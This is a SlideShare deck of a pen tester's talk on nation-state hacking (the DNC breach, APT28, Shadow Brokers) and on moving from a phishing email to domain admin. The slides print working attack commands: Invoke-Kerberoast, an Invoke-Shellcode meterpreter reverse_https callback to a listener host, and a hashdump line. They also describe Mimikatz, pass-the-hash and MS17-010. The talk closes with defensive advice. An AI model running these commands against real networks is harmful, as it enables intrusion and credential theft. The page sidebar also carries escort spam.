SlideShare a Scribd company logo
1 of 161
enemies of the west..
Aug 2016, shadow brokers claimed to have stolen
"cyber weapons“
Over 8 months they leaked exploits.
April 14 2017. They leaked Microsoft exploits.
MS17-010 (Same impact as MS08-067)
And the Criminals…
We are at war…
“Who am I?”
• Neil Lines - Pen Tester
• Involved in a range of security areas.
• Social Engineering (SE) is my favourite!
Case one…
May 2016 - US looked set to elect there 1st
female president…
June 2016, it was
reported that the
networks of the
Democratic National
Committee (DNC)
had been
compromised..
No proof of Russian
it is suspected that the
Group known as APT28
government's involvement
Russia-backed hacking
were responsible…
A month later, thousands of stolen emails
and attachments were published…
WikiLeaks.
The attack was carried out using
phishing emails sent to political
figures.
http://www.nationalcrimeagency.gov.uk - 785-the-cyber-threat-to-uk-business
As used by
APT28…
Following
It is reported that the DNC replaced its
computer systems, laptops and phones.
The Head of the DNC resigned.
Replacing all your computer systems,
laptops and phones, is not a cheap or
easy task..
This act alone shows the fear to such
attacks.
History may consider
this hack responsible
for losing an
election…
E-mails are now mightier than the
sword…
nation-state threats?
Russia, China, Iran and North
Korea…
WikiLeaks has published more files
today which it claims show the CIA
went to great lengths to disguise its
own hacking attacks and point
the finger at Russia, China, North
Korea and Iran…
“Your never be able to prevent all of
them, everything is penetrable
eventually…”
Michael Daniel - Former Special Assistant to the President and Cybersecurity
Coordinator.
What are the targets ?
• Governments / Politicians
• Medical companies / records
• Manufacturing / Retail
• Energy companies
• Banking
APT28 — also known as Fancy Bear…
A hacking group linked to
Russia's military has
begun taking aim at
France's presidential
candidate, Emmanuel
Macron…
March 15 2017,
domain names "onedrive-en-
marche.fr" and "mail-en-marche.fr”
Were registered by APT28…
Quick run down on others
• Ukrainian power supply;
• Yahoo! data breaches;
• the US Democratic Party Hacked;
• $81,000,000 from Bangladesh Bank..
To date No single act of
cybercrime has been regarded as
an act of war?
Think Nation-State Cyber
threats
What do you think?
Very costly;
Massive global attacks;
Highly sophisticated;
The Pro’s…
But wait…
Democratic National
Committee
Hacked via an email…
“Got me thinking”
• Could a single person accomplished
these hacks;
• Are they sophisticated?
• And what would the costs be?
Demo time…
remote to internal..
And if you click?
Vid 1. Email UNC
Can you crack The hash?
09/05/2017 - 8 hashes gained
crackstation, hashkiller-dict.txt,
Top125Thousand-probable, custom dictionary
and then again with rules – Reversed zero…
“Rocktastic” - Reversed one…
But why not rules??
Rules do not
add football teams.
add towns or city names.
add top 1000 male / female names.
And are very slow…
https://labs.nettitude.com
Another UNC example…
Vid 2. UNC Amazing
Now for
something
New…
Introducing Windows 10 S
Streamlined for security and
superior performance.
Microsoft-verified security
Microsoft Edge is your default
browser since it’s more secure
than Chrome or Firefox.
1 According to NSS Labs reports at
https://aka.ms/browser-security
NSS Labs conducted independent
global tests measuring how effective
browsers are at protecting against
socially engineered malware (SEM)
and phishing attacks.
I downloaded the report...
78,921 results were collected over 360
hours NSS engineers removed samples
that did not pass the validation criteria,
Ultimately, 991 unique URLs were
included in NSS’ final set of phishing
sites.
It had 10 pages of stuff and pretty
charts and more stuff
moral of the story Edge blocks
bad sites the quickest.
But Is it officiant against
phishing attacks?
NSS officially say it’s
the best…
Vid 3. Edge
Got creds What now?
remote to internal…
credit where credit is due…
Office 365 2FA
solution is
good…
need a shell…
Lets not Forget Zero day’s
they 2017 they don’t all
Cost $$$
A quick story…
NSA – owned a lot
of cool toys…
Shadow
Brokers
illegally
took the
toys…
They tried to
sell them…
No one paid…
Shadow Brokers
Released them for
free 14 April 2017…
Moral of the story don’t leave
port 445 SMB open from the
outside…
Before ETERNALBLUE
Media was raving about CVE-
2017-0199…
CVE-2017-0199
Download, execute Visual Basic script
containing PowerShell commands when a
user opens the document…
CVE-2017-0199
Bypass enable content
Vid 4. CVE-2017-0199
Problem is
0 days make headlines
Headlines = AV signatures
Functionality over 0 day!
Macro + OLE
Vid 5. Marcos
Vid 6. OLE
Final point before we go internal…
One word document can contain all of the
following not just one!
Macro,
OLE,
UNC..
Macro…
OLE…
UNC…
And then they stopped working…
The all new singing and dancing
Spam & Virus Blocker
dedicated antispam, antivirus, and
antiphishing security appliance…
“make
them come
to you!”
“make
them come
to you!”
@Hagan_23
“And I was like…”
Meanwhile 30 mins latter…
Vid 7. Make them come to
you
With New tricks…
Rocking internals!
Have I seen Bloodhound?
Yes…
Have I seen
DeathStar – looks cool
it elevates Domain privileges using the
GPP Passwords…
it obtains Domain Admin's credentials
using Mimikatz…
DeathStar – looks cool
it elevates Domain privileges using the
GPP Passwords…
it obtains Domain Admin's credentials
using Mimikatz…
Until
Microsoft Security Bulletin MS14-
025
windows server 2012
learn how to exploit in
many ways!
Windows PowerShell
Copyright (C) 2014 Microsoft
Corporation. All rights reserved.
PS C:UsersMYEXPLOIT>
Kerberoast…
Tim Medin revealed “Kerberoasting“
To the world.
1. Any user has rights!
2. Targets service accounts.
3. Used to be complex to exploit…
Invoke-Kerberoast -OutputFormat HashCat|Select-
Object -ExpandProperty hash
@benpturner and @davehardy20
Kerberoast - Using poshc2
1. Email a macro in;
2. Select your implant;
3. Run Invoke-Kerberoast;
4. Get hash;
5. Hashcat + Rocktastic;
6. DA…
Kerberos provides secure user
authentication with an industry standard
that permits interoperability.
Kerberos Version 5 added to Win2k – Still
used today.
Groups.xml
MS14-025: Vulnerability in Group Policy…
1. Any user has rights!
2. DNS Servers . . . : 10.1.20.220
3. 10.1.20.220sysvolNAMEPolicies
4. groups.xml, scheduledtasks.xml, & services.xml
services.xml
5. Microsoft published the AES encryption key on
MSDN
If this fails grab a
meterpreter shell…
Invoke-Shellcode -Payload
windows/meterpreter/reverse_https -
Lhost 192.168.0.100 -Lport 443 -Force
Meterpreter shell – How do I get DA?
The Filthy way…
Ipconfig /all find DC
MS17-010 the DC (2008)
Congratulations you won…
Ms17-010 – Kills things
Old school way to DA?
Do you have creds?
Yes, great were cooking…
Nope, good luck…
Vid 8. SMB Login
Local system rights
why does this happen?
• Misconfigured services and
shares on local machines are
common.
PSExec Time
Vid 9. PSEXEC
• meterpreter > getsystem
• [-] priv_elevate_getsystem: Opeation failed:
• [-] Named Pipe Impersonation
GETsystem fails, cry…
Privesc – is an art form…
Hit up the exploits
MSF ms14_058_track_popup_menu
MSF ms15_051_client_copy_image
don’t forget UAC Exploits Misconfigured
Services
HarmJ0y/PowerUp
meterpreter > getsystem
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b5
1404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Update 101..
Remote access to internal
network…
Time to Hunt out
users of interest
(DA)…
So why da?
• The keys to the castle.
• Highest privileges on a single domain.
• Access all domain resources.
Rule one of DA club…
Nessus, qualys or openvas
wont help!
Administrator:500:aad3b435b51404eeaad3b435b51
404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pass the hash still relevant…
Microsoft do not salt local hashes.
• “It is difficult to alter the password processing algorithms
without impacting a lot of subsystems and potentially
breaking the backward compatibility, which is the driving
force of the Windows ecosystem.”
Criminals catching up - slowly
• 2016 reports of Ransomware starting
to use PTH.
No reports of WannaCry
ransomware attack using
PTH?
That was a Mistake…
How can a pentester user
PTH?
Da, DA come out and play …
When should a DA
account be used?
So you found DA
how do you exploit?
Vid 10. Mimikatz
Update
Mimikatz don’t play nice on
win 10 and server 2012 or
2016…
MSF - lockout_keylogger
POSH - Cred-Popper
Common password
choices for da?
Recap
• Got external access in
• Got user creds
• Enumerated misconfigurations
• Got DA
How can you defend
against this?
Defence in depth
(also known as Castle
Approach)
“I want to know Who
clicked on it?”
People are quick to
blame people…
This is wrong…
How did the email get
to the person!
Use antiphishing
security
appliances
Office
disable macros
enforce protective
mode
Restrict outbound
traffic
SMB 445
use a siem…
Antivirus
Host based IPS
Host based FW
Then educate your
people…
@myexploit2600

More Related Content

What's hot

Hack the book Mini
Hack the book MiniHack the book Mini
Hack the book MiniKhairi Aiman
 
Computer security and_privacy_tif_key
Computer security and_privacy_tif_keyComputer security and_privacy_tif_key
Computer security and_privacy_tif_keythinkict
 
Information Security Day for Penn State Ag Sciences
Information Security Day for Penn State Ag SciencesInformation Security Day for Penn State Ag Sciences
Information Security Day for Penn State Ag SciencesVince Verbeke
 
Welcome to the world of hacking
Welcome to the world of hackingWelcome to the world of hacking
Welcome to the world of hackingTjylen Veselyj
 
fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)Abhishek Singh
 
Virus in computer via Internet by Sundas ilyas Kiani
Virus in computer via Internet  by Sundas ilyas KianiVirus in computer via Internet  by Sundas ilyas Kiani
Virus in computer via Internet by Sundas ilyas KianiSundas Kayani
 
Malware Goes to the Movies - Briefing
Malware Goes to the Movies - BriefingMalware Goes to the Movies - Briefing
Malware Goes to the Movies - BriefingAleksandr Yampolskiy
 
Five habits that might be a cyber security risk
Five habits that might be a cyber security riskFive habits that might be a cyber security risk
Five habits that might be a cyber security riskK. A. M Lutfullah
 
Hackingppt 160730081605
Hackingppt 160730081605Hackingppt 160730081605
Hackingppt 160730081605RAKESH SHARMA
 
It planet gigabyte gr 7 textbook
It planet gigabyte gr 7 textbookIt planet gigabyte gr 7 textbook
It planet gigabyte gr 7 textbookNityant Singhal
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)Avansa Mid- en Zuidwest
 

What's hot (13)

Hack the book Mini
Hack the book MiniHack the book Mini
Hack the book Mini
 
Computer security and_privacy_tif_key
Computer security and_privacy_tif_keyComputer security and_privacy_tif_key
Computer security and_privacy_tif_key
 
Emp tech las-week-2
Emp tech las-week-2Emp tech las-week-2
Emp tech las-week-2
 
Information Security Day for Penn State Ag Sciences
Information Security Day for Penn State Ag SciencesInformation Security Day for Penn State Ag Sciences
Information Security Day for Penn State Ag Sciences
 
Welcome to the world of hacking
Welcome to the world of hackingWelcome to the world of hacking
Welcome to the world of hacking
 
Hacker halted2
Hacker halted2Hacker halted2
Hacker halted2
 
fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)
 
Virus in computer via Internet by Sundas ilyas Kiani
Virus in computer via Internet  by Sundas ilyas KianiVirus in computer via Internet  by Sundas ilyas Kiani
Virus in computer via Internet by Sundas ilyas Kiani
 
Malware Goes to the Movies - Briefing
Malware Goes to the Movies - BriefingMalware Goes to the Movies - Briefing
Malware Goes to the Movies - Briefing
 
Five habits that might be a cyber security risk
Five habits that might be a cyber security riskFive habits that might be a cyber security risk
Five habits that might be a cyber security risk
 
Hackingppt 160730081605
Hackingppt 160730081605Hackingppt 160730081605
Hackingppt 160730081605
 
It planet gigabyte gr 7 textbook
It planet gigabyte gr 7 textbookIt planet gigabyte gr 7 textbook
It planet gigabyte gr 7 textbook
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 

Similar to Enemies of the west

When will passwords die? Research challenges and opportunities in user authen...
When will passwords die? Research challenges and opportunities in user authen...When will passwords die? Research challenges and opportunities in user authen...
When will passwords die? Research challenges and opportunities in user authen...Shujun Li
 
Igor Beliaiev "Incident Busters. Human Security Interaction"
Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev "Incident Busters. Human Security Interaction"
Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev
 
Refugees on Rails Berlin - #2 Tech Talk on Security
Refugees on Rails Berlin - #2 Tech Talk on SecurityRefugees on Rails Berlin - #2 Tech Talk on Security
Refugees on Rails Berlin - #2 Tech Talk on SecurityGianluca Varisco
 
What happened behind the closed doors at MS
What happened behind the closed doors at MSWhat happened behind the closed doors at MS
What happened behind the closed doors at MSDefCamp
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_pptNarayanan
 
Attacks on the cyber world
Attacks on the cyber worldAttacks on the cyber world
Attacks on the cyber worldNikhil Tripathi
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...HackIT Ukraine
 
Report on hacking crime and workable solution
Report on hacking crime and workable solutionReport on hacking crime and workable solution
Report on hacking crime and workable solutionShohag Prodhan
 
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...grecsl
 
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008eLiberatica
 
If i wake evil 360
If i wake evil   360If i wake evil   360
If i wake evil 360John Strand
 
Presentation 'a web application security' challenge
Presentation   'a web application security' challengePresentation   'a web application security' challenge
Presentation 'a web application security' challengeDinis Cruz
 
Current Emerging Threats
Current Emerging ThreatsCurrent Emerging Threats
Current Emerging Threatsdnomura
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
How to get genuine windows 7 with low cost
How to get genuine windows 7 with low cost How to get genuine windows 7 with low cost
How to get genuine windows 7 with low cost coldfire007
 
Getting Schooled DerbyCon 3.0
Getting Schooled DerbyCon 3.0Getting Schooled DerbyCon 3.0
Getting Schooled DerbyCon 3.0TonikJDK
 
Human/User-Centric Security
Human/User-Centric SecurityHuman/User-Centric Security
Human/User-Centric SecurityShujun Li
 

Similar to Enemies of the west (20)

When will passwords die? Research challenges and opportunities in user authen...
When will passwords die? Research challenges and opportunities in user authen...When will passwords die? Research challenges and opportunities in user authen...
When will passwords die? Research challenges and opportunities in user authen...
 
Igor Beliaiev "Incident Busters. Human Security Interaction"
Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev "Incident Busters. Human Security Interaction"
Igor Beliaiev "Incident Busters. Human Security Interaction"
 
Refugees on Rails Berlin - #2 Tech Talk on Security
Refugees on Rails Berlin - #2 Tech Talk on SecurityRefugees on Rails Berlin - #2 Tech Talk on Security
Refugees on Rails Berlin - #2 Tech Talk on Security
 
What happened behind the closed doors at MS
What happened behind the closed doors at MSWhat happened behind the closed doors at MS
What happened behind the closed doors at MS
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
 
Attacks on the cyber world
Attacks on the cyber worldAttacks on the cyber world
Attacks on the cyber world
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
 
Report on hacking crime and workable solution
Report on hacking crime and workable solutionReport on hacking crime and workable solution
Report on hacking crime and workable solution
 
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...
Project KidHack - Teaching Kids Security through Gaming at BSidesTampa on Feb...
 
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008
"BitDefender - What's Next" by Alexandru Balan @ eLiberatica 2008
 
Hacking_SharePoint_FINAL
Hacking_SharePoint_FINALHacking_SharePoint_FINAL
Hacking_SharePoint_FINAL
 
If i wake evil 360
If i wake evil   360If i wake evil   360
If i wake evil 360
 
Presentation 'a web application security' challenge
Presentation   'a web application security' challengePresentation   'a web application security' challenge
Presentation 'a web application security' challenge
 
Social Engineering
Social EngineeringSocial Engineering
Social Engineering
 
Current Emerging Threats
Current Emerging ThreatsCurrent Emerging Threats
Current Emerging Threats
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its Prevention
 
Social Engineering : To Err is Human...
Social Engineering : To Err is Human...Social Engineering : To Err is Human...
Social Engineering : To Err is Human...
 
How to get genuine windows 7 with low cost
How to get genuine windows 7 with low cost How to get genuine windows 7 with low cost
How to get genuine windows 7 with low cost
 
Getting Schooled DerbyCon 3.0
Getting Schooled DerbyCon 3.0Getting Schooled DerbyCon 3.0
Getting Schooled DerbyCon 3.0
 
Human/User-Centric Security
Human/User-Centric SecurityHuman/User-Centric Security
Human/User-Centric Security
 

Recently uploaded

Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceDelhi Call girls
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian  Call girls in Dubai +971563133746 Dubai  Call girlsRussian  Call girls in Dubai +971563133746 Dubai  Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 

Recently uploaded (20)

Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian  Call girls in Dubai +971563133746 Dubai  Call girlsRussian  Call girls in Dubai +971563133746 Dubai  Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girls
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 

Enemies of the west

Editor's Notes

  1. Equation as in maths
  2. Early pics of it working in MSF May 13th Interesting it’s a right blue screener
  3. May 12th 2017
  4. http://www.nationalcrimeagency.gov.uk/publications/785-the-cyber-threat-to-uk-business/file
  5. What do you think of when we say nation state threats?
  6. Dailymail 31 Mar 2017
  7. in an attempt to trick members of Macron's campaign team into clicking on
